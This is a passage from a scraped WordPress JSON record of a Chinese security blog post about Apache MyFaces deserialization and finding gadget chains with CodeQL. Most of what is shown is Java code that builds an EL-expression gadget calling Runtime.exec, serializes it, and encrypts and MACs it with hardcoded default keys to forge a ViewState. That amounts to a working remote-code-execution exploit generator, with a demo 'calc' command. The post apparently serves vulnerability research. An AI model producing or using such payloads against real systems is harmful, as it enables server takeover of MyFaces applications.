    private static final String PADDING = \"PKCS5Padding\";
\u200b
    private static final byte[] SECRET_KEY_BYTES = {
            37, 121, -50, 81, 28, 98, 59, 52
    };
\u200b
    private static final byte[] MAC_KEY_BYTES = {
            -38, -114, 119, -107, -65, -7, 76, -51, 5, 126, -86, 78, -30, -96, -122, 32, -126, -91, -65, 84, 7, -122, 106, -69, 123, 33, 49, 36, 46, -17, -95, 3, -54, 27, 119, 111, 42, 105, 17, 59, 87, 113, 38, 29, -119, -42, -82, 87, 43, 43, -63, -89, -1, 101, -81, 19, 79, -121, 74, -120, 112, 98, -7, 96
    };
\u200b
    private static final byte[] IV = null;
    private static final String MAC_ALGORITHM = \"HmacSHA1\";
\u200b
    public static void main(String[] args) throws Exception {
        Object data = createDataObject();
        String base64 = generateLegitString(data);
        String urlEncoded = URLEncoder.encode(base64, \"UTF-8\");
\u200b
        System.out.println(\"===== \u751f\u6210\u7684\u5408\u6cd5\u5b57\u7b26\u4e32 =====\");
        System.out.println(\"URL\u7f16\u7801\u540e: \" + urlEncoded);
    }
\u200b
    private static Object createDataObject() throws IllegalAccessException, NoSuchFieldException {
        FacesContextImpl fc   = new FacesContextImpl((ServletContext) null, (ServletRequest) null, (ServletResponse) null);
        ELContext initContext = new FacesELContext(new CompositeELResolver(), fc);
        Field field = FacesContextImplBase.class.getDeclaredField(\"_elContext\");
        field.setAccessible(true);
        field.set(fc, initContext);
        ExpressionFactory initFactory = ExpressionFactory.newInstance();
\u200b
        ExpressionFactory expressionFactory = new ExpressionFactoryImpl();
        ELContext elContext = new StandardELContext(expressionFactory);
        String exp = \"${''.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\\\"java.lang.Runtime.getRuntime().exec('calc')\\\")}\";
        ValueExpression valueExpression = expressionFactory.createValueExpression(elContext, exp, Object.class);
        ValueExpressionMethodExpression valueExpressionMethodExpression = new ValueExpressionMethodExpression(valueExpression);
        TagAttribute tagAttribute = new TagAttributeImpl(null, \"\", \"test\", \"test\", \"123\");
        ValueExpressionLiteral valueExpressionLiteral = new ValueExpressionLiteral(valueExpressionMethodExpression,Object.class);
        ContextAwareTagValueExpression contextawaretagvalueexpression = new ContextAwareTagValueExpression(tagAttribute,valueExpressionLiteral);
\u200b
        HashMap hashMap = new HashMap();
        hashMap.put(contextawaretagvalueexpression,\"byname\");
        return hashMap;
    }
\u200b
\u200b
    private static byte[] serialize(Object obj) throws Exception {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(baos)) {
            oos.writeObject(obj);
        }
        return baos.toByteArray();
    }
\u200b
    private static byte[] encryptWithMac(byte[] data) throws Exception {
        SecretKey secretKey = new SecretKeySpec(SECRET_KEY_BYTES, ALGORITHM);
        SecretKey macSecretKey = new SecretKeySpec(MAC_KEY_BYTES, MAC_ALGORITHM);
\u200b
        \/\/ 1. \u52a0\u5bc6
        Cipher cipher = Cipher.getInstance(ALGORITHM + \"\/\" + MODE + \"\/\" + PADDING);
        cipher.init(Cipher.ENCRYPT_MODE, secretKey);
        byte[] encrypted = cipher.doFinal(data);
\u200b
        \/\/ 2. \u8ba1\u7b97 MAC
        Mac mac = Mac.getInstance(MAC_ALGORITHM);
        mac.init(macSecretKey);
        mac.update(encrypted);
        byte[] macBytes = mac.doFinal();
\u200b
        byte[] result = new byte[encrypted.length + macBytes.length];
        System.arraycopy(encrypted, 0, result, 0, encrypted.length);
        System.arraycopy(macBytes, 0, result, encrypted.length, macBytes.length);
\u200b
        return result;
    }
\u200b
    public static String generateLegitString(Object data) throws Exception {
        byte[] bytes = serialize(data);  \/\/ \u4e0d\u518d\u538b\u7f29
        byte[] encrypted = encryptWithMac(bytes);
        return Base64.getEncoder().encodeToString(encrypted);
    }
}<\/pre>\n","protected":false},"excerpt":{"rendered":"
\u8fd9\u7bc7\u6587\u7ae0\u4ecb\u7ecd\u4e00\u4e0bMyfaces\u53cd\u5e8f\u5217\u5316\u7684\u70b9\uff0c\u4ee5\u53ca\u501f\u6b64\u6765\u5229\u7528CODEQL\u81ea\u52a8\u5316\u5730\u5bfb\u627e\u5176\u539f\u751f\u53cd\u5e8f\u5217\u5316\u94fe\u3002 \u5229\u7528CO […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[],"class_list":["post-54","post","type-post","status-publish","format-standard","hentry","category-java"],"_links":{"self":[{"href":"http:\/\/byname6.cn\/index.php\/wp-json\/wp\/v2\/posts\/54","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/byname6.cn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/byname6.cn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/byname6.cn\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/byname6.cn\/index.php\/wp-json\/wp\/v2\/comments?post=54"}],"version-history":[{"count":1,"href":"http:\/\/byname6.cn\/index.php\/wp-json\/wp\/v2\/posts\/54\/revisions"}],"predecessor-version":[{"id":55,"href":"http:\/\/byname6.cn\/index.php\/wp-json\/wp\/v2\/posts\/54\/revisions\/55"}],"wp:attachment":[{"href":"http:\/\/byname6.cn\/index.php\/wp-json\/wp\/v2\/media?parent=54"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/byname6.cn\/index.php\/wp-json\/wp\/v2\/categories?post=54"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/byname6.cn\/index.php\/wp-json\/wp\/v2\/tags?post=54"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}